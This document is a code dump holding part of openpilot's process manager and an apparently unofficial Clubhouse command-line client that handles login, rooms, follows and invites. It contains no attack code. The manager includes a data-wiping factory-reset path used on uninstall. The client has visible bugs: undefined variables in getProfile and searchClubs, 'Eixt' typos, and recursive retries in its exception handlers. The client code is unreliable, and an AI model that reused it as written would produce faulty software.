"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.py"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"params_learner": ("selfdrive/locationd", ["./params_learner"]),
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./start_sensord.py"]),
"gpsd": ("selfdrive/sensord", ["./start_gpsd.py"]),
"updated": "selfdrive.updated",
"athena": "selfdrive.athena.athenad",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'updated',
'athena',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'params_learner',
'visiond',
'proclogd',
'ubloxd',
'gpsd',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
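# A minimal sketch of how a site-specific daemon could be added through the
# hook above; the name and module path are hypothetical and this helper is
# never called in this file.
def example_register_extra_process():
  register_managed_process("exampled", "selfdrive.exampled", car_started=True)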
# ****************** process management functions ******************
def launcher(proc):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# terminate the zmq context since we forked
import zmq
zmq.Context.instance().term()
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
    # can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock(service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
params = Params()
logger_dead = False
while 1:
# get health of board, log this in "thermal"
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.18:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = [" running %s %s" % (p, running[p]) for p in running]
cloudlog.debug('\n'.join(running_list))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['plannerd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
cli.py
|
"""
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
from termcolor import colored
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
# Set some global variables
try:
import agorartc
RTC = agorartc.createRtcEngineBridge()
eventHandler = agorartc.RtcEngineEventHandlerBase()
RTC.initEventHandler(eventHandler)
# 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
RTC.initialize(Clubhouse.AGORA_KEY, None, agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
# Enhance voice quality
if RTC.setAudioProfile(
agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
agorartc.AUDIO_SCENARIO_GAME_STREAMING
) < 0:
print("[-] Failed to set the high quality audio profile")
except ImportError:
RTC = None
def set_interval(interval):
""" (int) -> decorator
set_interval decorator
"""
def decorator(func):
def wrap(*args, **kwargs):
stopped = threading.Event()
def loop():
while not stopped.wait(interval):
ret = func(*args, **kwargs)
if not ret:
break
thread = threading.Thread(target=loop)
thread.daemon = True
thread.start()
return stopped
return wrap
return decorator
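# A minimal sketch of how set_interval is meant to be used; _example_tick is
# hypothetical and only defined for illustration. Calling the decorated
# function starts the background loop and returns the Event used to stop it.
@set_interval(5)
def _example_tick():
    print("[.] tick")
    return True  # returning a falsy value would also end the loop
# stopper = _example_tick()  # start ticking every 5 seconds
# stopper.set()              # stop the loop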
def write_config(user_id, user_token, user_device,username,name, filename='setting.ini'):
""" (str, str, str, str) -> bool
Write Config. return True on successful file write
"""
config = configparser.ConfigParser()
config["Account"] = {
"user_device": user_device,
"user_id": user_id,
"name": name,
"username": username,
"user_token": user_token,
}
with open(filename, 'w') as config_file:
config.write(config_file)
return True
def read_config(filename='setting.ini'):
""" (str) -> dict of str
Read Config
"""
config = configparser.ConfigParser()
config.read(filename)
if "Account" in config:
return dict(config['Account'])
return dict()
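# A small sketch showing how the two helpers above round-trip the account
# settings; every value below is a dummy placeholder and the file name is an
# assumption.
def _example_config_roundtrip():
    write_config("1234", "auth-token", "device-id", "elonmusk1234", "John Smith",
                 filename="setting_example.ini")
    return read_config("setting_example.ini")  # -> dict with the keys written above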
def process_onboarding(client):
""" (Clubhouse) -> NoneType
This is to process the initial setup for the first time user.
"""
print("=" * 30)
print("Welcome to Clubhouse!\n")
print("The registration is not yet complete.")
print("Finish the process by entering your legal name and your username.")
print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
print(" YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
print("=" * 30)
while True:
user_realname = input("[.] Enter your legal name (John Smith): ")
user_username = input("[.] Enter your username (elonmusk1234): ")
user_realname_split = user_realname.split(" ")
if len(user_realname_split) != 2:
print("[-] Please enter your legal name properly.")
continue
if not (user_realname_split[0].isalpha() and
user_realname_split[1].isalpha()):
print("[-] Your legal name is supposed to be written in alphabets only.")
continue
if len(user_username) > 16:
print("[-] Your username exceeds above 16 characters.")
continue
if not user_username.isalnum():
print("[-] Your username is supposed to be in alphanumerics only.")
continue
client.update_name(user_realname)
result = client.update_username(user_username)
if not result['success']:
print(f"[-] You failed to update your username. ({result})")
continue
result = client.check_waitlist_status()
if not result['success']:
print("[-] Your registration failed.")
print(f" It's better to sign up from a real device. ({result})")
continue
print("[-] Registration Complete!")
print(" Try registering by real device if this process pops again.")
break
def print_channel_list(client, max_limit=100):
""" (Clubhouse) -> NoneType
Print list of channels
"""
# Get channels and print out
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("Option")
table.add_column("channel_name", style="cyan", justify="right")
table.add_column("speaker_count")
table.add_column("topic")
channels = client.get_channels()['channels']
i = 0
for channel in channels:
i += 1
if i > max_limit:
break
_option = ""
_option += "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
table.add_row(
str(i),
str(_option),
str(channel['channel']),
str(int(channel['num_speakers'])),
str(channel['topic']),
)
console.print(table)
def chat_main(client):
""" (Clubhouse) -> NoneType
Main function for chat
"""
max_limit = 8000
channel_speaker_permission = False
_wait_func = None
_ping_func = None
def _request_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Raise hands for permissions
"""
if not channel_speaker_permission:
client.audience_reply(channel_name, True, False)
_wait_func = _wait_speaker_permission(client, channel_name, user_id)
print("[/] You've raised your hand. Wait for the moderator to give you the permission.")
@set_interval(30)
def _ping_keep_alive(client, channel_name):
""" (str) -> bool
Continue to ping alive every 30 seconds.
"""
client.active_ping(channel_name)
return True
@set_interval(10)
def _wait_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Function that runs when you've requested for a voice permission.
"""
# Get some random users from the channel.
_channel_info = client.get_channel(channel_name)
if _channel_info['success']:
for _user in _channel_info['users']:
if _user['user_id'] != user_id:
user_id = _user['user_id']
break
# Check if the moderator allowed your request.
res_inv = client.accept_speaker_invite(channel_name, user_id)
if res_inv['success']:
print("[-] Now you have a speaker permission.")
print(" Please re-join this channel to activate a permission.")
return False
return True
while True:
# Choose which channel to enter.
# Join the talk on success.
user_id = client.HEADERS.get("CH-UserID")
print_channel_list(client, max_limit)
channel_name = input("[.] Enter channel_name: ")
if str(channel_name) == "Exit":
break
channel_info = client.join_channel(channel_name)
if not channel_info['success']:
# Check if this channel_name was taken from the link
channel_info = client.join_channel(channel_name, "link", "e30=")
if not channel_info['success']:
print(f"[-] Error while joining the channel ({channel_info['error_message']})")
continue
# List currently available users (TOP 20 only.)
# Also, check for the current user's speaker permission.
channel_speaker_permission = False
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("is_speaker")
table.add_column("is_moderator")
users = channel_info['users']
i = 0
for user in users:
i += 1
if i > max_limit:
break
table.add_row(
str(i),
str(user['user_id']),
                str(user['username']),
                str(user['name']),
str(user['is_speaker']),
str(user['is_moderator']),
)
# Check if the user is the speaker
if user['user_id'] == int(user_id):
channel_speaker_permission = bool(user['is_speaker'])
console.print(table)
# Check for the voice level.
if RTC:
token = channel_info['token']
RTC.joinChannel(token, channel_name, "", int(user_id))
else:
print("[!] Agora SDK is not installed.")
print(" You may not speak or listen to the conversation.")
# Activate pinging
client.active_ping(channel_name)
_ping_func = _ping_keep_alive(client, channel_name)
_wait_func = None
# Add raise_hands key bindings for speaker permission
# Sorry for the bad quality
if not channel_speaker_permission:
if sys.platform == "darwin": # OSX
_hotkey = "9"
elif sys.platform == "win32": # Windows
_hotkey = "ctrl+shift+h"
print(f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
keyboard.add_hotkey(
_hotkey,
_request_speaker_permission,
args=(client, channel_name, user_id)
)
input(colored("[*] Press [Enter] to quit conversation.\n",'yellow'))
keyboard.unhook_all()
# Safely leave the channel upon quitting the channel.
if _ping_func:
_ping_func.set()
if _wait_func:
_wait_func.set()
if RTC:
RTC.leaveChannel()
client.leave_channel(channel_name)
def user_authentication(client):
""" (Clubhouse) -> NoneType
Just for authenticating the user.
"""
result = None
while True:
user_phone_number = input("[.] Please enter your phone number. (+818043217654) > ")
result = client.start_phone_number_auth(user_phone_number)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
result = None
while True:
verification_code = input("[.] Please enter the SMS verification code (1234, 0000, ...) > ")
result = client.complete_phone_number_auth(user_phone_number, verification_code)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
# print(result)
user_id = result['user_profile']['user_id']
user_token = result['auth_token']
user_device = client.HEADERS.get("CH-DeviceId")
username = result['user_profile']['username']
name = result['user_profile']['name']
write_config(user_id, user_token, user_device, username,name)
print("[.] Writing configuration file complete.")
if result['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Authenticate user first and start doing something
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
if result['is_onboarding']:
process_onboarding(client)
return
def invite(client):
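    """ (Clubhouse) -> NoneType
    Show the remaining invite count and send an invite to a phone number entered at the prompt.
    """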
try:
_res = client.me()
num_invites = _res['num_invites']
print("[!] invites : " + str(num_invites))
if num_invites == 0:
print("Not have Invite")
print("=" * 30)
return
numberPhone = input(colored("[.] Enter Phone number for invite: ",'cyan'))
if str(numberPhone) == "Exit":
return
_res = client.invite_to_app(None,numberPhone,"Hello")
print(_res)
print("=" * 30)
    except Exception:
return invite(client)
return
def inviteWaitlist(client):
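    """ (Clubhouse) -> NoneType
    List actionable waitlist notifications and let a selected user in from the waitlist.
    """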
try:
_res = client.get_actionable_notifications()
print("[!] Let them in : " + str(_res['count']))
if _res['count'] == 0:
print("=" * 30)
return
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("Noti_id", style="cyan", justify="right")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("type")
table.add_column("name")
users = _res['notifications']
i = 0
for user in users:
i += 1
if i > _res['count']:
break
table.add_row(
str(i),
str(user['actionable_notification_id']),
str(user['user_profile']['user_id']),
str(user['user_profile']['username']),
str(user['type']),
str(user['user_profile']['name']),
)
console.print(table)
user_id = input(colored("[.] Enter No. for invite: ",'cyan'))
if str(user_id) == "Exit":
return
_res = client.invite_from_waitlist(int(users[int(user_id) - 1]['user_profile']['user_id']))
print(_res)
_res = client.ignore_actionable_notification(int(users[int(user_id) - 1]['actionable_notification_id']))
print(_res)
print("=" * 30)
    except Exception:
return inviteWaitlist(client)
return
def Suggested_follows_all(client):
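    """ (Clubhouse) -> NoneType
    Print the full suggested-follows list in a table (user_id, username, name, bio).
    """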
_res = client.get_suggested_follows_all()
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("bio")
users = _res['users']
i = 0
for user in users:
i += 1
if i > _res['count']:
break
table.add_row(
str(i),
str(user['user_id']),
str(user['username']),
str(user['name']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
return
def getProfile(client):
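    """ (Clubhouse) -> NoneType
    Look up a user profile by user_id, print its details, and optionally follow that user.
    """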
_user_id = input(colored("Enter user_id for get profile: ",'cyan'))
try:
if str(user_id) == "Exit":
return
_res = client.get_profile(int(_user_id))
_user = _res['user_profile']
print("=" * 30)
print("[!] ID : " + str(_user['user_id']))
print("[!] name : " + str(_user['name']))
print("[!] displayname : " + str(_user['displayname']))
print("[!] username : @" + str(_user['username']))
print()
print("[!] followers : " + str(_user['num_followers']) +", following : "+ str(_user['num_following']))
print("[!] follows me : " + str(_user['follows_me']))
print()
print("[!] twitter : " + str(_user['twitter']))
print("[!] instagram : " + str(_user['instagram']))
print()
if _user['invited_by_user_profile'] != None:
print("[!] invited : [" + str(_user['invited_by_user_profile']['user_id'])+"] "+ str(_user['invited_by_user_profile']['name']))
print()
print("[!] bio : ")
print(str(_user['bio']))
print()
print("=" * 30)
_Following = input(colored("[.] Following ? [Y/n]: ",'cyan'))
if _Following == "Y":
_res = client.follow(_user['user_id'])
print(_res)
print("=" * 30)
except:
return getProfile(client)
return
def addFollow(client):
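    """ (Clubhouse) -> NoneType
    Follow the user whose user_id is entered at the prompt.
    """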
user_id = input(colored("[.] Enter user_id for Follow: ",'cyan'))
try:
if str(user_id) == "Exit":
return
_res = client.follow(user_id)
print(_res)
print("=" * 30)
except Exception:
return addFollow(client)
return
def getFollowing(client):
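    """ (Clubhouse) -> NoneType
    Print the first page (up to 100 entries) of accounts that the given user_id is following.
    """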
try:
user_id = input(colored("[.] Enter user_id for get Following: ",'cyan'))
if str(user_id) == "Exit":
return
_res = client.get_following(user_id, page_size=100, page=1)
users = _res['users']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("bio")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
except Exception:
return getFollowing(client)
return
def searchUsers(client):
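    """ (Clubhouse) -> NoneType
    Search users by a keyword and print the results in a table.
    """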
try:
query = input(colored("[.] Search User : ",'cyan'))
if str(query) == "Exit":
return
_res = client.search_users(query,False,False,False)
users = _res['users']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("bio")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
except Exception:
return searchUsers(client)
return
def getFollowers(client):
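    """ (Clubhouse) -> NoneType
    Print the first page (up to 100 entries) of followers of the given user_id.
    """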
try:
user_id = input(colored("[.] Enter user_id for get Followers: ",'cyan'))
if str(user_id) == "Exit":
print("=" * 30)
return
_res = client.get_followers(user_id, page_size=100, page=1)
users = _res['users']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("bio")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
except Exception:
        return getFollowers(client)
return
def getOnlineFriends(client):
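    """ (Clubhouse) -> NoneType
    Print the list of currently online friends, including the topic and channel they are in when available.
    """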
_res = client.get_online_friends()
# print(_res)
users = _res['users']
print(colored("[!] Online Friends : ",'yellow') + str(len(users)))
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("active")
table.add_column("topic")
table.add_column("channel", style="cyan", justify="right")
i = 0
for user in users:
i += 1
_topic = ""
_channel = ""
if i > int(len(users)):
break
if len(user) > 5:
_topic = user['topic']
_channel = user['channel']
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['last_active_minutes']),
str(_topic),
str(_channel),
)
console.print(table)
print("=" * 30)
return
def nameSetting(client):
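    """ (Clubhouse) -> NoneType
    Sub-menu for updating the username, name or display name of the current account.
    """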
print(colored(" [1] Update Username", 'yellow'))
print(colored(" [2] Update Name", 'yellow'))
print(colored(" [3] Update Display name", 'yellow'))
print(colored(" [Exit] back to main menu", 'yellow'))
print("=" * 30)
    _menu = input(colored("[.] Enter Menu [1-3]: ", 'cyan'))
    if str(_menu) == "Exit":
        print("=" * 30)
        return
    _menu = int(_menu)
if _menu == 1:
_input = input("[.] Enter Username : ")
if str(_input) == "Exit":
print("=" * 30)
return
_res = client.update_username(str(_input))
elif _menu == 2:
_input = input("[.] Enter Name : ")
if str(_input) == "Exit":
print("=" * 30)
return
        _res = client.update_name(str(_input))
elif _menu == 3:
_input = input("[.] Enter Display : ")
if str(_input) == "Exit":
print("=" * 30)
return
        _res = client.update_displayname(str(_input))
else:
return nameSetting(client)
    print(_res)
print("=" * 30)
return
def Profile(client):
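    """ (Clubhouse) -> NoneType
    Print the cached profile of the current account (from the config file) and the remaining invite count.
    """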
_res = client.me()
num_invites = _res['num_invites']
user_config = read_config()
user_id = user_config.get('user_id')
name = user_config.get('name')
username = user_config.get('username')
print("[!] ID : " + user_id)
print("[!] name : " + name)
print("[!] username : @" + username)
print("[!] invites : " + str(num_invites))
print("=" * 30)
return
def searchClubs(client):
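    """ (Clubhouse) -> NoneType
    Search clubs by a keyword and print club_id, follower/member counts and membership flags in a table.
    """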
_input = input("[.] Search clubs : ")
if str(_menu) == "Exit":
print("=" * 30)
return
try:
_res = client.search_clubs(_input,False,False,False)
users = _res['clubs']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("club_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("num_followers")
table.add_column("num_members")
table.add_column("is_member")
table.add_column("is_follower")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['club_id']),
str(user['name']),
str(user['num_followers']),
str(user['num_members']),
str(user['is_member']),
str(user['is_follower']),
)
console.print(table)
print("=" * 30)
except Exception:
return searchClubs(client)
return
def getTopics(client):
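    """ (Clubhouse) -> NoneType
    Print all topic categories and their sub-topics in a table.
    """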
try:
_res = client.get_all_topics()
users = _res['topics']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("id", style="cyan", justify="right")
table.add_column("title")
ct = 0
i = 0
for user in users:
i += 1
ct += 1
if i > int(len(users)):
break
table.add_row(
str(ct),
str("-"),
str(user['title']),
)
usersj = user['topics']
j = 0
for userj in usersj:
j += 1
ct += 1
if j > int(len(usersj)):
break
table.add_row(
str(ct),
str(userj['id']),
str(userj['title']),
)
console.print(table)
print("=" * 30)
except Exception:
return
return
def addInterest(client):
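    """ (Clubhouse) -> NoneType
    Add a club or a topic to the current account's interests.
    """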
try:
_input = input("[.] Add club or topic [c/t]: ")
if _input == "c":
topic_id = input("[.] Enter topic_id : ")
_res = client.add_user_topic(None,topic_id)
elif _input == "t":
club_id = input("[.] Enter club_id : ")
_res = client.add_user_topic(club_id,None)
elif _input == "Eixt":
return
print(_res)
print("=" * 30)
except Exception:
return addInterest(client)
return
def rmInterest(client):
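    """ (Clubhouse) -> NoneType
    Remove a club or a topic from the current account's interests.
    """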
try:
_input = input("[.] Remove club or topic [c/t]: ")
if _input == "c":
topic_id = input("[.] Enter topic_id : ")
_res = client.remove_user_topic(None,topic_id)
elif _input == "t":
club_id = input("[.] Enter club_id : ")
_res = client.remove_user_topic(club_id,None)
elif _input == "Eixt":
return
print(_res)
print("=" * 30)
except Exception:
return rmInterest(client)
return
def menu(client):
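    """ (Clubhouse) -> NoneType
    Main interactive menu that dispatches to the feature functions above.
    """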
while True:
print(colored(" [0] Notifications", 'yellow'))
print(colored(" [1] Room Chat", 'yellow'))
print(colored(" [2] Search Users", 'yellow'))
print(colored(" [3] View Following", 'yellow'))
print(colored(" [4] View Followers", 'yellow'))
print(colored(" [5] Follow", 'yellow'))
print(colored(" [6] Invite to App", 'yellow'))
print(colored(" [7] Invite From Waitlist", 'yellow'))
print(colored(" [8] Suggested follows all", 'yellow'))
print(colored(" [9] Name Setting", 'yellow'))
print(colored(" [10] Profile", 'yellow'))
print(colored(" [11] Online Friends", 'yellow'))
print(colored(" [12] Get Profile", 'yellow'))
print(colored(" [13] Get Clubs", 'yellow'))
print(colored(" [14] Get Topics", 'yellow'))
print(colored(" [15] Add your're Interest", 'yellow'))
print(colored(" [16] Remove your're Interest", 'yellow'))
print("=" * 30)
_menu = int(input(colored("[.] Enter Menu [0-16]: ", 'cyan')))
print("=" * 30)
if _menu == 0:
noTi(client)
elif _menu == 1:
chat_main(client)
elif _menu == 2:
searchUsers(client)
elif _menu == 3:
getFollowing(client)
elif _menu == 4:
getFollowers(client)
elif _menu == 5:
addFollow(client)
elif _menu == 6:
invite(client)
elif _menu == 7:
inviteWaitlist(client)
elif _menu == 8:
Suggested_follows_all(client)
elif _menu == 9:
nameSetting(client)
elif _menu == 10:
Profile(client)
elif _menu == 11:
